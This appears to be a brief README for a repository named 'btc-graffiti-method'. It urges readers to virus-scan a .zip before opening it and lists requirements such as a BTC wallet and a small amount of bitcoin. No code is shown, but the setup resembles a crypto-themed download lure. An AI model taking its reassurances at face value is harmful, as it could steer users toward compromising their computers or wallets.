Mulc1b3R/btc-graffiti-method/README.md

 Note; You can scan the .zip file before opening ; visit https://internxt.com/virus-scanner , and drag and drop the .zip into the box provided.

+Reqiurements;

+             1. any btc wallet. (to send the tx)
+             2. any web browser.
+             3. any hardware device.
+             4. any operating system.
+             5. wifi connection.
+             6. minimal amount of btc (in order to interact with the blockchain.

+             The Blockchain belongs to everyone...